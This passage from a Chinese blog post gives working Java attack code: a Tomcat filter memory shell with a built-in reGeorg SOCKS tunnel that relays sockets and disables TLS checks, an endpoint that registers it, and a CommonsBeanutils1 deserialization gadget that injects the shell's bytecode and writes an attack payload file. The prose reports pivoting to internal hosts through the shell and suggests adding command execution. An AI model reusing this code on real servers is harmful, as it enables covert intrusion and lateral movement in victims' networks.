    28. WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
    29. StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext();
    30. Field Configs = null;
    31. try {
    32. Configs = standardContext.getClass().getDeclaredField("filterConfigs");
    33. } catch (NoSuchFieldException e) {
    34. Configs = standardContext.getClass().getSuperclass().getDeclaredField("filterConfigs");
    35. }
    36. Configs.setAccessible(true);
    37. Map filterConfigs = (Map) Configs.get(standardContext);
    38. FilterReGorg filterReGorg = new FilterReGorg();
    39. FilterDef filterDef = new FilterDef();
    40. filterDef.setFilter(filterReGorg);
    41. filterDef.setFilterName(name);
    42. filterDef.setFilterClass(filterReGorg.getClass().getName());
    43. /**
    44. * 将filterDef添加到filterDefs中
    45. */
    46. standardContext.addFilterDef(filterDef);
    47. FilterMap filterMap = new FilterMap();
    48. filterMap.addURLPattern(URLPattern);
    49. filterMap.setFilterName(name);
    50. filterMap.setDispatcher(DispatcherType.REQUEST.name());
    51. standardContext.addFilterMapBefore(filterMap);
    52. Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class);
    53. constructor.setAccessible(true);
    54. ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext, filterDef);
    55. filterConfigs.put(name, filterConfig);
    56. } catch (Exception e) {
    57. e.printStackTrace();
    58. }
    59. }
    60. @Override
    61. public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
    62. System.out.println("Do Filter ......");
    63. String regorg;
    64. if ((regorg = servletRequest.getParameter("regorg")) != null) {
    65. String charslist = "8z4lBs+92ucIAJtnON0CELaMZ5H3/eg6KDFjqPpyfxdvrSiTW1wQhbGmVkXY7UoR";
    66. Object[] args = new Object[]{
    67. servletRequest, //0
    68. servletResponse, //1
    69. charslist.toCharArray(), //2
    70. new byte[]{-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 6, -1, -1, -1, 28, 18, 49, 8, 27, 2, 25, 31, 60, 0, 7, -1, -1, -1, -1, -1, -1, -1, 12, 4, 19, 33, 20, 34, 54, 26, 11, 13, 32, 21, 23, 17, 16, 37, 51, 63, 45, 47, 61, 56, 48, 58, 59, 24, -1, -1, -1, -1, -1, -1, 22, 53, 10, 42, 29, 40, 30, 52, 46, 35, 57, 3, 55, 15, 62, 38, 36, 44, 5, 14, 9, 43, 50, 41, 39, 1, -1, -1, -1, -1, -1},//3
    71. new Integer(200),//4
    72. new Integer(513),//5
    73. new Integer(524288),//6
    74. "n4BSI0z90MDONaJ5HhNyAhrWZaPxel/V3hDLCGb9J+VvZLPr/EAb3a1vCGq1tMPJAasIL+PuEG1a/aPyCPEvZpNTay52LpufgjJGLmfVeQJZHESxCpbN24hSnK==",//7
    75. new Integer(2047140399),//8
    76. new Integer(0),//9
    77. new Integer(0),//10
    78. new Integer(0),//11
    79. };
    80. equals(args);
    81. }
    82. filterChain.doFilter(servletRequest, servletResponse);
    83. System.out.println("doFilter");
    84. }
    85. @Override
    86. public boolean equals(Object obj) {
    87. try {
    88. Object[] args = (Object[]) obj;
    89. Object request = args[0];
    90. Object response = args[1];
    91. en = (char[]) args[2];
    92. de = (byte[]) args[3];
    93. int HTTPCODE = (Integer) args[4];
    94. int READBUF = (Integer) args[5];
    95. int MAXREADSIZE = (Integer) args[6];
    96. String GeorgHello = (String) args[7];
    97. int BLV_L_OFFSET = (Integer) args[8];
    98. int USE_REQUEST_TEMPLATE = (Integer) args[9];
    99. int START_INDEX = (Integer) args[10];
    100. int END_INDEX = (Integer) args[11];
    101. int DATA = 1;
    102. int CMD = 2;
    103. int MARK = 3;
    104. int STATUS = 4;
    105. int ERROR = 5;
    106. int IP = 6;
    107. int PORT = 7;
    108. int REDIRECTURL = 8;
    109. int FORCEREDIRECT = 9;
    110. Writer out = (Writer) invokeMethod(response, "getWriter", new Object[0]);
    111. Object[] info = new Object[40];
    112. Object[] rinfo = new Object[40];
    113. String requestDataHead = "";
    114. String requestDataTail = "";
    115. try {
    116. if (((int)(Integer)(invokeMethod(request, "getContentLength", new Object[0]))) != -1) {
    117. String inputData = "";
    118. InputStream in = (InputStream) invokeMethod(request, "getInputStream", new Object[0]);
    119. while ( true ){
    120. int buffLen = in.available();
    121. if (buffLen == -1)
    122. break;
    123. byte[] buff = new byte[buffLen];
    124. if (in.read(buff) == -1)
    125. break;
    126. inputData += new String(buff);
    127. }
    128. if (USE_REQUEST_TEMPLATE == 1) {
    129. requestDataHead = inputData.substring(0, START_INDEX);
    130. requestDataTail = inputData.substring(inputData.length() - END_INDEX, inputData.length());
    131. inputData = inputData.substring(START_INDEX);
    132. inputData = inputData.substring(0, inputData.length() - END_INDEX);
    133. }
    134. byte[] data = b64de(inputData);
    135. info = blv_decode(data, BLV_L_OFFSET);
    136. }
    137. } catch ( Exception e) {
    138. // out.write(new String(b64de(GeorgHello)));
    139. out.write(e.toString());
    140. out.flush();
    141. out.close();
    142. return false; // exit
    143. }
    144. String rUrl = (String) info[REDIRECTURL];
    145. if (rUrl != null) {
    146. String force = (String) info[FORCEREDIRECT];
    147. if (force.compareTo("TRUE") == 0 || !islocal(rUrl)){
    148. info[REDIRECTURL] = null;
    149. info[FORCEREDIRECT] = null;
    150. invokeMethod(response, "reset", new Object[0]);
    151. String method = (String) invokeMethod(request, "getMethod", new Object[0]);
    152. URL u = new URL(rUrl);
    153. HttpURLConnection conn = (HttpURLConnection) u.openConnection();
    154. conn.setRequestMethod(method);
    155. conn.setDoOutput(true);
    156. // ignore ssl verify
    157. if (HttpsURLConnection.class.isInstance(conn)){
    158. ((HttpsURLConnection)conn).setHostnameVerifier(this);
    159. SSLContext ctx = SSLContext.getInstance("SSL");
    160. ctx.init(null, new TrustManager[] { this }, null);
    161. ((HttpsURLConnection)conn).setSSLSocketFactory(ctx.getSocketFactory());
    162. }
    163. // conn.setConnectTimeout(200);
    164. // conn.setReadTimeout(200);
    165. Enumeration enu = (Enumeration) invokeMethod(request, "getHeaderNames", new Object[0]);
    166. List<String> keys = Collections.list(enu);
    167. Collections.reverse(keys);
    168. for (String key : keys){
    169. String value = (String) invokeMethod(request, "getHeader", new Object[]{key});
    170. conn.setRequestProperty(headerkey(key), value);
    171. }
    172. if (((int)(Integer)(invokeMethod(request, "getContentLength", new Object[0]))) != -1){
    173. OutputStream output;
    174. try{
    175. output = conn.getOutputStream();
    176. }catch(Exception e){
    177. return false;
    178. }
    179. String newData = requestDataHead + b64en(blv_encode(info, BLV_L_OFFSET)) + requestDataTail;
    180. byte[] data = newData.getBytes();
    181. output.write(data, 0, data.length);
    182. output.flush();
    183. output.close();
    184. }
    185. for (String key : conn.getHeaderFields().keySet()) {
    186. if (key != null && !key.equalsIgnoreCase("Content-Length") && !key.equalsIgnoreCase("Transfer-Encoding")){
    187. String value = conn.getHeaderField(key);
    188. invokeMethod(response, "setHeader", new Object[]{key, value});
    189. }
    190. }
    191. InputStream hin;
    192. if (conn.getResponseCode() < HttpURLConnection.HTTP_BAD_REQUEST) {
    193. hin = conn.getInputStream();
    194. } else {
    195. hin = conn.getErrorStream();
    196. if (hin == null){
    197. invokeMethod(response, "setStatus", new Object[]{HTTPCODE});
    198. return false;
    199. }
    200. }
    201. int i;
    202. byte[] buffer = new byte[1024];
    203. ByteArrayOutputStream baos = new ByteArrayOutputStream();
    204. while ((i = hin.read(buffer)) != -1) {
    205. byte[] data = new byte[i];
    206. System.arraycopy(buffer, 0, data, 0, i);
    207. baos.write(data);
    208. }
    209. String responseBody = baos.toString();
    210. invokeMethod(response, "addHeader", new Object[]{"Content-Length", Integer.toString(responseBody.length())});
    211. invokeMethod(response, "setStatus", new Object[]{conn.getResponseCode()});
    212. out.write(responseBody.trim());
    213. out.flush();
    214. out.close();
    215. if ( true ) return false; // exit
    216. }
    217. }
    218. invokeMethod(response, "resetBuffer", new Object[0]);
    219. invokeMethod(response, "setStatus", new Object[]{HTTPCODE});
    220. String cmd = (String) info[CMD];
    221. if (cmd != null) {
    222. String mark = (String) info[MARK];
    223. if (cmd.compareTo("CONNECT") == 0) {
    224. try {
    225. String target = (String) info[IP];
    226. int port = Integer.parseInt((String) info[PORT]);
    227. SocketChannel socketChannel = SocketChannel.open();
    228. socketChannel.socket().connect(new InetSocketAddress(target, port), 3000); // set timeout 3 seconds, default 120 seconds
    229. socketChannel.configureBlocking(false);
    230. sessions.put(mark, socketChannel);
    231. rinfo[STATUS] = "OK";
    232. } catch (Exception e) {
    233. rinfo[STATUS] = "FAIL";
    234. rinfo[ERROR] = e.toString();
    235. }
    236. } else if (cmd.compareTo("DISCONNECT") == 0) {
    237. SocketChannel socketChannel = (SocketChannel)sessions.get(mark);
    238. try{
    239. socketChannel.socket().close();
    240. } catch (Exception e) {
    241. }
    242. sessions.remove(mark);
    243. } else if (cmd.compareTo("READ") == 0){
    244. SocketChannel socketChannel = (SocketChannel)sessions.get(mark);
    245. try{
    246. if ( socketChannel != null ) {
    247. ByteBuffer buf = ByteBuffer.allocate(READBUF);
    248. int bytesRead = socketChannel.read(buf);
    249. int maxRead = MAXREADSIZE;
    250. int readLen = 0;
    251. ByteArrayOutputStream readData = new ByteArrayOutputStream();
    252. while (bytesRead > 0){
    253. byte[] block = new byte[bytesRead];
    254. System.arraycopy(buf.array(), 0, block, 0, bytesRead);
    255. readData.write(block);
    256. ((java.nio.Buffer)buf).clear();
    257. readLen += bytesRead;
    258. if (bytesRead < READBUF || readLen >= maxRead) {
    259. rinfo[DATA] = readData.toByteArray();
    260. break;
    261. }
    262. bytesRead = socketChannel.read(buf);
    263. }
    264. }
    265. rinfo[STATUS] = "OK";
    266. } catch (Exception e) {
    267. rinfo[STATUS] = "FAIL";
    268. rinfo[ERROR] = e.toString();
    269. }
    270. } else if (cmd.compareTo("FORWARD") == 0){
    271. SocketChannel socketChannel = (SocketChannel)sessions.get(mark);
    272. try {
    273. byte[] writeData = (byte[]) info[DATA];
    274. ByteBuffer buf = ByteBuffer.allocate(writeData.length);
    275. buf.put(writeData);
    276. buf.flip();
    277. while(buf.hasRemaining())
    278. socketChannel.write(buf);
    279. rinfo[STATUS] = "OK";
    280. } catch (Exception e) {
    281. rinfo[STATUS] = "FAIL";
    282. rinfo[ERROR] = e.toString();
    283. socketChannel.socket().close();
    284. }
    285. }
    286. out.write(b64en(blv_encode(rinfo, BLV_L_OFFSET)));
    287. out.flush();
    288. out.close();
    289. } else {
    290. out.write(new String(b64de(GeorgHello)));
    291. out.flush();
    292. out.close();
    293. }
    294. } catch (Exception e){
    295. }
    296. return false;
    297. }
    298. public String b64en(byte[] data) {
    299. StringBuffer sb = new StringBuffer();
    300. int len = data.length;
    301. int i = 0;
    302. int b1, b2, b3;
    303. while (i < len) {
    304. b1 = data[i++] & 0xff;
    305. if (i == len) {
    306. sb.append(en[b1 >>> 2]);
    307. sb.append(en[(b1 & 0x3) << 4]);
    308. sb.append("==");
    309. break;
    310. }
    311. b2 = data[i++] & 0xff;
    312. if (i == len) {
    313. sb.append(en[b1 >>> 2]);
    314. sb.append(en[((b1 & 0x03) << 4)
    315. | ((b2 & 0xf0) >>> 4)]);
    316. sb.append(en[(b2 & 0x0f) << 2]);
    317. sb.append("=");
    318. break;
    319. }
    320. b3 = data[i++] & 0xff;
    321. sb.append(en[b1 >>> 2]);
    322. sb.append(en[((b1 & 0x03) << 4)
    323. | ((b2 & 0xf0) >>> 4)]);
    324. sb.append(en[((b2 & 0x0f) << 2)
    325. | ((b3 & 0xc0) >>> 6)]);
    326. sb.append(en[b3 & 0x3f]);
    327. }
    328. return sb.toString();
    329. }
    330. public byte[] b64de(String str) {
    331. byte[] data = str.getBytes();
    332. int len = data.length;
    333. ByteArrayOutputStream buf = new ByteArrayOutputStream(len);
    334. int i = 0;
    335. int b1, b2, b3, b4;
    336. while (i < len) {
    337. do {
    338. b1 = de[data[i++]];
    339. } while (i < len && b1 == -1);
    340. if (b1 == -1) {
    341. break;
    342. }
    343. do {
    344. b2 = de[data[i++]];
    345. } while (i < len && b2 == -1);
    346. if (b2 == -1) {
    347. break;
    348. }
    349. buf.write((int) ((b1 << 2) | ((b2 & 0x30) >>> 4)));
    350. do {
    351. b3 = data[i++];
    352. if (b3 == 61) {
    353. return buf.toByteArray();
    354. }
    355. b3 = de[b3];
    356. } while (i < len && b3 == -1);
    357. if (b3 == -1) {
    358. break;
    359. }
    360. buf.write((int) (((b2 & 0x0f) << 4) | ((b3 & 0x3c) >>> 2)));
    361. do {
    362. b4 = data[i++];
    363. if (b4 == 61) {
    364. return buf.toByteArray();
    365. }
    366. b4 = de[b4];
    367. } while (i < len && b4 == -1);
    368. if (b4 == -1) {
    369. break;
    370. }
    371. buf.write((int) (((b3 & 0x03) << 6) | b4));
    372. }
    373. return buf.toByteArray();
    374. }
    375. static String headerkey(String str) throws Exception {
    376. String out = "";
    377. for (String block: str.split("-")) {
    378. out += block.substring(0, 1).toUpperCase() + block.substring(1);
    379. out += "-";
    380. }
    381. return out.substring(0, out.length() - 1);
    382. }
    383. boolean islocal(String url) throws Exception {
    384. String ip = (new URL(url)).getHost();
    385. Enumeration<NetworkInterface> nifs = NetworkInterface.getNetworkInterfaces();
    386. while (nifs.hasMoreElements()) {
    387. NetworkInterface nif = nifs.nextElement();
    388. Enumeration<InetAddress> addresses = nif.getInetAddresses();
    389. while (addresses.hasMoreElements()) {
    390. InetAddress addr = addresses.nextElement();
    391. if (addr instanceof Inet4Address)
    392. if (addr.getHostAddress().equals(ip))
    393. return true;
    394. }
    395. }
    396. return false;
    397. }
    398. public static Object[] blv_decode(byte[] data, Integer offset) {
    399. Object[] info = new Object[40];
    400. int i = 0;
    401. int data_len = data.length;
    402. int b;
    403. byte[] length = new byte[4];
    404. ByteArrayInputStream dataInput = new ByteArrayInputStream(data);
    405. while ( i < data_len ) {
    406. b = dataInput.read();
    407. dataInput.read(length, 0, length.length);
    408. int l = bytesToInt(length) - offset;
    409. byte[] v = new byte[l];
    410. dataInput.read(v, 0, v.length);
    411. i += ( 5 + l );
    412. // 9 is BLVHEAD_LEN
    413. if ( b > 1 && b <= 9 ) {
    414. info[b] = new String(v);
    415. } else {
    416. info[b] = v;
    417. }
    418. }
    419. return info;
    420. }
    421. public static byte[] blv_encode(Object[] info, Integer offset) {
    422. info[0] = randBytes(5, 20);
    423. info[39] = randBytes(5, 20);
    424. ByteArrayOutputStream buf = new ByteArrayOutputStream();
    425. for (int b = 0; b < info.length; b++) {
    426. if ( info[b] != null ) {
    427. Object o = info[b];
    428. byte[] v;
    429. if ( o instanceof String ){
    430. v = ( (String) o ).getBytes();
    431. } else {
    432. v = (byte[]) o;
    433. }
    434. buf.write(b);
    435. try {
    436. buf.write(intToBytes(v.length + offset));
    437. buf.write(v);
    438. }catch(Exception e) {
    439. }
    440. }
    441. }
    442. return buf.toByteArray();
    443. }
    444. public static Object invokeMethod(Object obj, String methodName, Object[] args) throws Exception {
    445. Class[] argTypes = new Class[args.length];
    446. for (int i = 0; i < args.length; i++) {
    447. Class argType = args[i].getClass();
    448. if(Integer.class.isAssignableFrom(argType)){
    449. argType = int.class;
    450. }else if(Long.class.isAssignableFrom(argType)){
    451. argType = long.class;
    452. }else if(Short.class.isAssignableFrom(argType)){
    453. argType = short.class;
    454. }
    455. argTypes[i] = argType;
    456. }
    457. return invokeMethod2(obj, methodName, argTypes,args);
    458. }
    459. public static Object invokeMethod2(Object obj, String methodName, Class[] argTypes, Object[] args) throws Exception {
    460. Class clazz = obj.getClass();
    461. Method method = clazz.getMethod(methodName, argTypes);
    462. if (!method.isAccessible()){
    463. method.setAccessible(true);
    464. }
    465. return method.invoke(obj, args);
    466. }
    467. public static byte[] randBytes(int min, int max) {
    468. Random r = new Random();
    469. int len = r.nextInt((max - min) + 1) + min;
    470. byte[] randbytes = new byte[len];
    471. r.nextBytes(randbytes);
    472. return randbytes;
    473. }
    474. public static int bytesToInt(byte[] bytes) {
    475. int i;
    476. i = ( bytes[3] & 0xff )
    477. | (( bytes[2] & 0xff ) << 8 )
    478. | (( bytes[1] & 0xff ) << 16)
    479. | (( bytes[0] & 0xff ) << 24);
    480. return i;
    481. }
    482. public static byte[] intToBytes(int value) {
    483. byte[] src = new byte[4];
    484. src[3] = (byte) (value & 0xFF);
    485. src[2] = (byte) ((value >> 8) & 0xFF);
    486. src[1] = (byte) ((value >> 16) & 0xFF);
    487. src[0] = (byte) ((value >> 24) & 0xFF);
    488. return src;
    489. }
    490. public boolean verify(String s, SSLSession sslSession) {
    491. return true;
    492. }
    493. public void checkClientTrusted(X509Certificate[] x509Certificates, String s) throws CertificateException {
    494. }
    495. public void checkServerTrusted(X509Certificate[] x509Certificates, String s) throws CertificateException {
    496. }
    497. public X509Certificate[] getAcceptedIssuers() {
    498. return new X509Certificate[0];
    499. }
    500. }

    触发添加filter代码如下 :

    1. @RequestMapping(value = "/reGeorgtunnel3")
    2. public void FilterReGeorgtunnel2(ServletRequest request, ServletResponse response) throws Exception {
    3. try{
    4. ClassPool pool = ClassPool.getDefault();
    5. CtClass clazz = pool.get(com.example.seriallzpayload.service.FilterReGorg.class.getName());
    6. Class myclass = clazz.toClass();
    7. myclass.newInstance();
    8. }catch (Exception e) {
    9. e.printStackTrace();
    10. }
    11. }

    完成后执行,首先访问/reGeorgtunnel3,会执行FilterReGorg类并添加filter,然后我们访问任意页面添加参数regorg,看能否进入我们的filter:

    访问完reGeorgtunnel3,再访问任意页面添加regorg,即可成功进入我们的代理:

     

    由此我们成功添加了filter代理,下面我们进行反序列化,通过CommonsBeanutils1调用链插入filter

    反序列化:

    这个具体的原理之前已经讲过了,这里就不在重复,直接上代码:

    1. package com.example.seriallzpayload.service;
    2. import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
    3. import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
    4. import javassist.ClassPool;
    5. import javassist.CtClass;
    6. import org.apache.commons.beanutils.BeanComparator;
    7. import java.io.ByteArrayOutputStream;
    8. import java.io.FileOutputStream;
    9. import java.io.ObjectOutputStream;
    10. import java.lang.reflect.Field;
    11. import java.util.PriorityQueue;
    12. public class SerializPayload {
    13. public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
    14. Field field = obj.getClass().getDeclaredField(fieldName);
    15. field.setAccessible(true);
    16. field.set(obj, value);
    17. }
    18. public static void CommonsBeanutils1() throws Exception{
    19. try {
    20. ClassPool pool = ClassPool.getDefault();
    21. //CtClass clazz = pool.get(com.example.seriallzpayload.service.serialfilter.class.getName());
    22. CtClass clazz = pool.get(com.example.seriallzpayload.service.FilterReGorg.class.getName());
    23. byte[] code = clazz.toBytecode();
    24. TemplatesImpl obj = new TemplatesImpl();
    25. setFieldValue(obj, "_bytecodes", new byte[][]{code});
    26. setFieldValue(obj, "_name", "HelloTemplatesImpl");
    27. setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
    28. final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);
    29. final PriorityQueue queue = new PriorityQueue(2, comparator);
    30. // stub data for replacement later
    31. queue.add("1");
    32. queue.add("1");
    33. setFieldValue(comparator, "property", "outputProperties");
    34. setFieldValue(queue, "queue", new Object[]{obj, obj});
    35. FileOutputStream fileOutputStream = new FileOutputStream("seraReGorg.bin");
    36. ObjectOutputStream outputStream = new ObjectOutputStream(fileOutputStream);
    37. outputStream.writeObject(queue);
    38. outputStream.close();
    39. fileOutputStream.close();
    40. }catch (Exception e) {
    41. e.printStackTrace();
    42. }
    43. }
    44. }
    45. 另外我们FilterReGorg代码需要继承AbstractTranslet,修改为:

      public class FilterReGorg  extends AbstractTranslet implements Filter, HostnameVerifier, X509TrustManager
      

       执行CommonsBeanutils1后可以生成一个seraReGorg.bin,即序列化的攻击POC,然后我们进行测试,首先我们测试环境是否干净,可以看到此时未插入我们的filter代理:

       然后我们对seraReGorg.bin进行反序列化后查看,可以看到已经成功插入:

      使用FoxyProxy添加socks5代理也可成功通过代理服务器作为跳板访问主机。 

       

       结尾:

      至此通过反序列化漏洞添加filter实现代理就完成了,但是这个针对的tomcat版本有要求,不能是高版本,高版本中无法获取上下文中的standardContext导致攻击失效,其中我们也可以在doFilter中添加多个过滤,比如代理,命令执行等等进行二次开发,这些就凭兴趣自己玩了。

    46. 相关阅读:
      登录成功后跳转到之前打开的页面
      Photoshop图层混合模式公式(Unity,CG实现)
      【C++AVL树】4种旋转详讲
      Linux操作系统中如何查看系统层面的各项参数
      安卓UI面试题 41-45
      redis 性能这么好,你不完全知道
      zk session expire会引起HA模式的rm一直处于standby吗
      15经验模态分解及其改进程序,EMD,EEMD, CEEMDAN,三合一程序,已调试完成,替换自己数据可直接跑。
      将 WSL 安装到C盘以外的位置
      基于Java+SpringBoot+Vue+echarts健身房管理系统设计和实现
    47. 原文地址:https://blog.csdn.net/GalaxySpaceX/article/details/133680352